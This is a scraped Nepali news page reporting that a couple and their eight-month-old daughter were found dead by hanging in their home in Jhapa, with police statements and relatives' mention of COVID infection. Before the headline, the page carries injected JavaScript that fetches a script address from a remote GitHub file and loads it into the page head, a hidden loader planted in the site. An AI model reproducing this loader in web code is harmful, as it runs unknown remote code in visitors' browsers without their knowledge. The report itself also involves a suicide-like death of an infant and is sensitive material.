;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); झापामा एक दम्पत्ती आठ महिने छोरीसहित झुण्डिएको अवस्थामा मृत फेला – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • झापामा एक दम्पत्ती आठ महिने छोरीसहित झुण्डिएको अवस्थामा मृत फेला
Breaking News

झापामा एक दम्पत्ती आठ महिने छोरीसहित झुण्डिएको अवस्थामा मृत फेला

जुनेली न्यूज, काठमाण्डौ । झापाको कन्काइ नगरपालिका-१ मा एक दम्पत्ती आठ महिने छोरीसहित झुण्डिएको अवस्थामा मृत फेला परेका छन् ।
मृत्यु हुनेमा ३४ वर्षीय रविन विक, उनकी श्रीमती २९ वर्षीया मुना र आठ महिने छोरी रुविना छन् । उनीहरु आज बिहान आफ्नै घरभित्र झुण्डिएको अवस्थामा मृत फेला परेको झापाका एसपी सानुराम भट्टराईले जानकारी दिए ।

घटनास्थलमा प्रहरीको टोली पुगेको र सेनाको टोलीलाई पनि बोलाइएको प्रहरीले जनाएको छ । मुचुल्का उठाएर ढोका फोडेर भित्र पस्ने र घटना प्रकृति हेरेर थप अनुसन्धान गर्ने एसपी भट्टराईले बताए ।

मृतकका आफन्तका अनुसार उनीहरु कोरोना संक्रमित थिए । ‘उनीहरु कोभिड पोजेटिभ थिए भनेर अरुले भनेका छन् तर कोकोलाई संक्रमण भएको हो भन्ने खुलेको छैन,’ एसपी भट्टराईले भने ।

फेसबुक प्रतिक्रियाहरु